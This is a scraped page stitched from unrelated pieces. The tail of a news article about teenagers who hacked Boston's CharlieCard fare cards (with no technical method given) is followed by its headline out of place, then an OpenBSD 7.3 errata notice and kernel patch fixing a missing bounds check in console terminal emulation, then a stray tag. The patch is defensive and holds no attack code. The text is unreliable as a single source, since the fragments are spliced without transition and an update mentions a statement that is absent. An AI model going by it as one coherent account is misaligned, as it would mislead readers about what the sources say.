The teens say that as with Rauch’s cloning technique, the transit authority appears to be trying to counter their technique by detecting altered cards and blocking them. But they say that only a small fraction of the cards they’ve added money to have been caught. “The mitigations they have aren’t really a patch that seals the vulnerability. Instead, they play whack-a-mole with the cards as they come up,” says Campbell.

“We’ve had some of our cards get disabled, but most get through,” adds Harris.

So are all four of them using their CharlieCard-hacking technique to roam the Boston subway system for free? “No comment.”

For now, the hacker team is just happy to be able to give their talk without the heavy-handed censorship that the MBTA attempted with its lawsuit 15 years ago. Harris argues that the MBTA likely learned its lesson from that approach, which only drew attention to the hackers’ findings. “It’s great that they’re not doing that now—that they’re not shooting themselves in the foot. And it’s a lot less stressful for everyone,” Harris says.

He’s also glad, on the other hand, that the MBTA took such a hardline approach to the 2008 talk that it got his attention and kickstarted the group’s research almost a decade and a half later. “If they hadn’t done that,” Harris says, “we wouldn’t be here.”

_Update 5 pm ET, August 10, 2023: Added a statement form an MBTA spokesperson._

Teens Hacked Boston Subway’s CharlieCard to Get Infinite Free Rides—and This Time Nobody Got Sued

OpenBSD 7.3 before errata 014 is missing an argument-count bounds check in console terminal emulation. This could cause incorrect memory access and a kernel crash after receiving crafted DCS or CSI terminal escape sequences.

untrusted comment: verify with openbsd-73-base.pub RWQS90bYzZ4XFphffQmz/SYU+JVzJdm/iyJa9hVeMTnpTmA0jJFJS/NgTZd0Bj1X1eLlwhxQ6sFnUFkbOe76DxsmLs/Y1C1vpgc= OpenBSD 7.3 errata 014, July 24, 2023: Missing bounds check in console terminal emulation could cause a kernel crash after receiving specially crafted escape sequences. Apply by doing: signify -Vep /etc/signify/openbsd-73-base.pub -x 014\_wscons.patch.sig \\ -m - | (cd /usr/src && patch -p0) And then rebuild and install a new kernel: KK=\`sysctl -n kern.osversion | cut -d# -f1\` cd /usr/src/sys/arch/\`machine\`/compile/$KK make obj make config make make install Index: sys/dev/wscons/wsemul\_sun.c =================================================================== RCS file: /cvs/src/sys/dev/wscons/wsemul\_sun.c,v diff -u -p -u -r1.36 wsemul\_sun.c --- sys/dev/wscons/wsemul\_sun.c 6 Mar 2023 20:34:35 -0000 1.36 +++ sys/dev/wscons/wsemul\_sun.c 24 Jul 2023 13:56:55 -0000 @@ -617,13 +617,14 @@ wsemul\_sun\_output\_control(struct wsemul\_ break; case ';': /\* argument terminator \*/ - edp->nargs++; + if (edp->nargs < SUN\_EMUL\_NARGS) + edp->nargs++; break; default: /\* end of escape sequence \*/ - oargs = edp->nargs++; - if (edp->nargs > SUN\_EMUL\_NARGS) - edp->nargs = SUN\_EMUL\_NARGS; + oargs = edp->nargs; + if (edp->nargs < SUN\_EMUL\_NARGS) + edp->nargs++; rc = wsemul\_sun\_control(edp, instate); if (rc != 0) { /\* undo nargs progress \*/ Index: sys/dev/wscons/wsemul\_vt100.c =================================================================== RCS file: /cvs/src/sys/dev/wscons/wsemul\_vt100.c,v diff -u -p -u -r1.45 wsemul\_vt100.c --- sys/dev/wscons/wsemul\_vt100.c 6 Mar 2023 20:34:35 -0000 1.45 +++ sys/dev/wscons/wsemul\_vt100.c 24 Jul 2023 13:56:55 -0000 @@ -868,16 +868,12 @@ wsemul\_vt100\_output\_dcs(struct wsemul\_vt (instate->inchar - '0'); break; case ';': /\* argument terminator \*/ - edp->nargs++; + if (edp->nargs < VT100\_EMUL\_NARGS) + edp->nargs++; break; default: - edp->nargs++; - if (edp->nargs > VT100\_EMUL\_NARGS) { -#ifdef VT100\_DEBUG - printf("vt100: too many arguments\\n"); -#endif - edp->nargs = VT100\_EMUL\_NARGS; - } + if (edp->nargs < VT100\_EMUL\_NARGS) + edp->nargs++; newstate = VT100\_EMUL\_STATE\_STRING; switch (instate->inchar) { case '$': @@ -1069,7 +1065,8 @@ wsemul\_vt100\_output\_csi(struct wsemul\_vt (instate->inchar - '0'); break; case ';': /\* argument terminator \*/ - edp->nargs++; + if (edp->nargs < VT100\_EMUL\_NARGS) + edp->nargs++; break; case '?': /\* DEC specific \*/ case '>': /\* DA query \*/ @@ -1082,13 +1079,9 @@ wsemul\_vt100\_output\_csi(struct wsemul\_vt edp->modif2 = (char)instate->inchar; break; default: /\* end of escape sequence \*/ - oargs = edp->nargs++; - if (edp->nargs > VT100\_EMUL\_NARGS) { -#ifdef VT100\_DEBUG - printf("vt100: too many arguments\\n"); -#endif - edp->nargs = VT100\_EMUL\_NARGS; - } + oargs = edp->nargs; + if (edp->nargs < VT100\_EMUL\_NARGS) + edp->nargs++; rc = wsemul\_vt100\_handle\_csi(edp, instate); if (rc != 0) { edp->nargs = oargs;

Tag

#mac